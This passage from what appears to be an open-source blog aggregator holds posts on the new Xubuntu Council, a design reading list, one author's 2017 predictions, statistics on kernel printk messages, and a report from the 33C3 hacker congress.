If you wish to learn more about the council, you can read about it in the Xubuntu Council section of our contributor documentation.

Who is in the Council?

On August 31st, Simon Steinbeiß announced the results of vote by Xubuntu project members. The first Xubuntu Council contains the following members:

  • Sean Davis (bluesabre), the council chair and the Xubuntu Technical Lead
  • Simon Steinbeiß (ochosi), the Xubuntu Artwork Lead and a former XPL
  • Pasi Lallinaho (knome), the Xubuntu Website Lead and a former XPL and former Xubuntu Marketing Lead

As the titles alone can tell you, the three council members all have a strong history with Xubuntu project. Today we want to go a bit deeper than just these titles, which is why we asked the council members a few quick questions so you can start to get to know them.

Interviewing the Council

What inspired you to get involved with the Xubuntu project?

Sean: I started using Xubuntu in 2006 (when it was first released) and used it all throughout college and into my career. I started reporting bugs to the project in 2012 and contributing to the Ubuntu community later that year. My (selfish) inspiration was that I wanted to make my preferred operating system even better!

Simon: When Dapper Drake saw the light of day 10 years ago (I know, it’s incredible – it’s been a decade!) and I started using LInux my first choice was – and this has never changed – Xfce and Ubuntu. At first I never thought I would be fit to contribute, but the warm welcome from the amazing community around these projects pulled me in.

Pasi: When I converted to Linux from Windows for good in 2006, I started contributing to the Amarok project, my media player of choice back then. A few years later my contributions there slowed down at it felt like a natural step to start working with the operating system I was using.

Can you share some thoughts about the future of Xubuntu?

Sean: Xubuntu has always taken a conversative approach to the desktop. It includes simple, effective applications on top of a traditional desktop. That said, the technologies that Xubuntu is built on (GTK+, GStreamer, Xfce, and many many others) are undergoing significant changes and we’re always looking to improve. I think we’ll continue to see improvements that will welcome new users and please our longtime fans.

Simon: Change is hard for many people, however based on a recent psych test I am “surprisingly optimistic” :) While Xubuntu – and this is heritage from Xfce – has a what many would call “conservative” approach I believe we can still improve the current experience by quite a bit. I don’t mean this change has to be radical, but it should be more than just “repainting the walls”. This is why I personally welcome the changes in GTK+ and why I believe our future is bright.

Pasi: As Sean mentioned, we will be seeing changes in Xubuntu in consequence of the underlying technologies and components – whether we like them or not. To be able to be part of the decision making and that Xubuntu can and will feel as integrated and polished as it does now, it’s important to keep involved with the migration work. While this will mean less resources to put into Xubuntu-specific work in the near future, I believe it leads us into a better place later.

So that people can get to know you a bit better, is there an interesting fact about yourself that you wish to share?

Sean: Two unrelated things: I’m also an Xfce developer and one of my current life goals is to visit Japan (and maybe one day live there).

Simon: My background is a bit atypical: my two majors at University were Philosophy and Comparitive Religious Studies.

Pasi: In addition to contributing to open source, I use my free time to play modern board games. I have about 75 of them in my office closet.

Further questions?

If you have any questions about the council, please don’t hesitate to ask! You can contact us by joining the IRC channel #xubuntu-devel on freenode or by joining the Xubuntu-devel mailing list.

Additionally, if this sparked your interest to get involved, be in touch with anybody from the Xubuntu team. There are a lot of things to do and all kinds of skills are useful. Maybe someday you might even become a Xubuntu Council member!

on January 01, 2017 04:43 PM

December’s reading list

Canonical Design Team

We hope everyone has had a great start to the year and fun holiday season. Here are the best links shared by the design team during the last month of 2016:

  1. Creating a Weekly Research Cadence
  2. We’ve updated the radios and checkboxes on GOV.UK
  3. A new algorithm for finding a visual center of a polygon
  4. Mockuuups Studio – Product mockups, made easy & instantly
  5. Retiring pieces of a design system
  6. Yes, progressive enhancement is a f*ucking moral argument
  7. Space in Design Systems
  8. BBC GEL: Design Patterns
  9. Interview / Mark Boardman (StreetView Project)
  10. Dan Ariely: What makes us feel good about our work?

Thank you to Anthony, Grazina, Jamie, Karl and me for the links this month!

on January 01, 2017 09:03 AM

Staring Ahead At 2017

Stephen Michael Kellat

2016 was not the best of years. While my parents have told me that it wasn't a bad year, my "log line" for year was that this was the year I was under investigation, threat assessment, and who knows what other official review. These things kinda happen when you work in the civil service of a president who sometimes thinks he is a Stuart monarch and even worse acts like one from time to time.

Tonight I spent some time playing with a software-defined radio. A project in 2017 is to set up an automated recorder out in the garage to monitor the CBC Radio One outlet that is audible from the other side of Lake Erie in southwest Ontario. Right now there is a bit of a noise problem to overcome with some antenna construction as the waterfall display below shows I can barely even hear the local outlet of NOAA Weather Radio (KEC58) out in Erie, Pennsylvania amidst some broad-spectrum noise shown in yellow:

Seeking the station at 162.400 MHz

Even though it isn't funded, I'm still looking at the Outernet research project. By way of Joey Hess over in the pump.io spaces, I see I'm not the only one thinking about them either as there was a presentation at 33c3. Eventually I'll need to watch that.

I will note contra David Tomaschik that disclosure of employee information that is available under the Freedom of Information Act isn't really a hack. In general you can request that directory information from any federal agency including DHS and FBI. The FOIA micro-site created by the US Department of Justice can help in drafting your own inquiries.

The folks at the Ubuntu Podcast had an opportunity to prognosticate about the future. With the storm and stress of my civil service post, frankly I forgot to chip in. This happens increasingly. Since I used to be an Ubuntu-related podcaster I can offer some prognostication.

My guesses for 2017 include:

  • I may not be a federal civil servant by the end of 2017. It probably won't be by my choice based upon the views of the incoming administration.
  • 2017 will be the Year of Xubuntu.
  • Laura Cowen will finish her PhD.
  • Lubuntu will be subsumed into the Kubuntu project as a light version of Kubuntu.
  • There will be a steep contraction in the number of Ubuntu derivatives.
  • James Cameron will retcon the Terminator franchise once again and now call Skynet instead Mirai.
  • The United States will lose a significant portion of its consumer broadband access. The rest of the world won't notice.
  • I may celebrate New Year's Eve 2017 well outside the Continental United States and quite possibly outside US jurisdiction.

To all a happy new year. We have work to do.

on January 01, 2017 04:21 AM

December 31, 2016

The kernel contains tens of thousands of statements that may print various errors, warnings and debug/information messages to the kernel log.  Unsurprisingly, as the kernel grows in size, so does the quantity of these messages.  I've been scraping the kernel source for various kernel printk style statements and macros and scanning these for various typos and spelling mistakes and to make this easier I hacked up kernelscan (a quick and dirty parser) that helps me find literal strings from the kernel for spell checking.

Using kernelscan, I've gathered some statistics for the number of kernel print statements for various kernel releases:


As one can see, we have over 200,000 messages in the 4.9 kernel(!).  Given the kernel growth, we can see this seems to roughly correlate with the kernel source size:



So how many lines of code in the kernel do we have per kernel printk messages over time?


..showing that the trend is to have more lines of code per frequent printk statements over time.  I didn't differentiate between different types of printk message, so it is hard to see any deeper trends on what kinds of messages are being logged more or less frequently over each release, for example,  perhaps there are less debug messages landing in the kernel nowadays.

I find it quite amazing that the kernel contains quite so many printk messages; it would be useful to see just how many of these are actually in a production kernel. I suspect quite large number are for driver debugging and may be conditionally omitted at build time.
on December 31, 2016 06:20 PM

December 30, 2016

33C3: Works for me

Sebastian Kügler

Rocket ScienceRocket Science
The calm days between christmas and new year are best celebrated with your family (of choice), so I went to Hamburg where the 33rd edition of the Chaos Computer Congress opened the door to 12.000 hackers, civil rights activists, makers and people interested in privacy and computer security. The motto of this congress is “works for me” which is meant as a critical nudge towards developers who stop after technology works for them, while it should work for everyone. A demand for a change in attitude.

33C3's ballroom33C3’s ballroom

The congress is a huge gathering of people to share information, hack, talk and party, and the past days have been a blast. This congress strikes an excellent balance between high quality talks, interesting hacks and electronics and a laid back atmosphere, all almost around the clock. (Well, the official track stops around 2 a.m., but continues around half past eleven in the morning.) The schedule is really relaxed, which makes it possibly to party at night, and interrupt dancing for a quick presentation about colonizing intergalactic space — done by domain experts.

The conference also has a large unconference part, hacking spaces, and lounge areas, meaning that the setup is somewhere in between a technology conference, a large hack-fest and a techno party. Everything is filled to the brim with electronics and decorated nicely, and after a few days, the outside world simply starts to fade and “congress” becomes the new reality.

No Love for the U.S. Gov

I’ve attended a bunch of sessions on civil rights and cyber warfare, as well as more technical things. One presentation that touched me in particular was the story of Lauri Love, who is accused of stealing data from agencies including Federal Reserve, Nasa and FBI. This talk was presented by a civil rights activist from the Courage foundation, and two hackers from Anonymous and Lulzsec. While Love is a UK citizen, the US is demanding extradition from the UK so they can prosecute him under US law (which is much stricter than the UK’s). This would create a precedent making it much easier for the US to essentially be able to prosecute citizens anywhere under US law.

What kind of technoparty^W congres is this?What kind of technoparty^W congres is this?
This, combined with the US jail system poses a serious threat to Love. He wouldn’t be the first person to commit suicide under the pressure put on him by the US government agencies, who really seem to be playing hardball here. (Chelsea Manning, the whistleblower behind the videos of the baghdad airstrikes, in which US airforce killed innocent citizens carelessly, among others) who suffered from mental health issues, was put into solitary confinement, instead of receiving health care. Against that background, the UK would send one of their own citizens into a jail that doesn’t even respect basic human rights. On particularly touching moment was when the brother of Aaron Swartz took the microphone and appealed to the people who asked how they could prevent another Aaron, that helping Lauri (and Chelsea) is the way to help out, and that’s where the energy should be put. Very moving.

The media team at this event is recording most of the sessions, so if you have some time to spare, head over to media.ccc.de and get your fix. See you at 34C3!

on December 30, 2016 12:26 PM